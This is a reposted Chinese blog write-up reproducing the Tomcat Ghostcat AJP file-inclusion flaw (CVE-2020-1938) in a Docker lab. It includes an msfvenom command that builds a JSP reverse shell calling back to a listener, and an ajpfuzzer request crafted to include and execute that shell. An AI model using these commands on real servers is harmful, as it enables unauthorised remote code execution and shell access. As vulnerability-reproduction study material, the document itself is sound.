相關內容簡體繁體

CVE-2020-1938 Tomcat 文件包含RCE復現

本文轉載自查看原文 2020-03-18 15:27 1749 基礎積累與漏洞復現

CVE-2020-1938 Tomcat 文件包含RCE復現

CVE-2020-1938 Tomcat 文件包含RCE復現

docker環境

docker search tomcat-8.5.32
docker pull duonghuuphuc/tomcat-8.5.32
docker run -d -p 8080:8080 -p 8009:8009 --name ghostcat duonghuuphuc/tomcat-8.5.32
docker port ghostcat

MSF生成反彈馬並監聽

生成jspshell為shell.txt
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.104 LPORT=999 -f raw > shell.txt
監聽

復現

上傳shell.txt至ROOT
ajpfuzzer
https://github.com/doyensec/ajpfuzzer

java -jar ajpfuzzer_v0.6.jar
connect 192.168.0.102 8009
forwardrequest 2 "HTTP/1.1" "/11.jsp" 192.168.0.102 192.168.0.102 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:11.jsp","javax.servlet.include.path_info:shell.txt","javax.servlet.include.servlet_path:/"

11.jsp可以換為任意該web項目中沒有的jsp文件，這樣tomcat才會去調用DefaultServlet

shell應該被執行了，但不知為什么一直建立不了session

參考

https://mp.weixin.qq.com/s?__biz=MzUyNDk0MDQ3OQ==&mid=2247485009&idx=1&sn=5f619c27ec994949f5fa69d41d2dee05&chksm=fa24e381cd536a972db2cc5a5fc09be33a7833f1caa6440bb5979d3d7ea052384645fbd2b62c&mpshare=1&scene=23&srcid=&sharer_sharetime=1584439554350&sharer_shareid=1f92b9e8670fffeb7eea157894e3536a#rd

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Tomcat文件包含漏洞的搭建與復現：CVE-2020-1938 Tomcat AJP 文件包含漏洞復現(CVE-2020-1938) Tomcat文件包含漏洞（CVE-2020-1938）復現 Apache Tomcat 文件包含漏洞 (CVE-2020-1938) 復現 CVE-2020-1938漏洞復現（文件讀取文件包含） CVE-2020-1938 Apache-Tomcat-Ajp 文件包含漏洞復現 CVE-2020-1938 Tomcat 文件讀取復現漏洞復現-Tomcat AJP 文件包含漏洞（CVE-2020-1938） (CVE-2020-1938)Apache Tomcat AJP文件包含漏洞復現 Apache Tomcat 文件包含漏洞（CVE-2020-1938）

粵ICP備18138465號 © 2018-2025 CODEPRJ.COM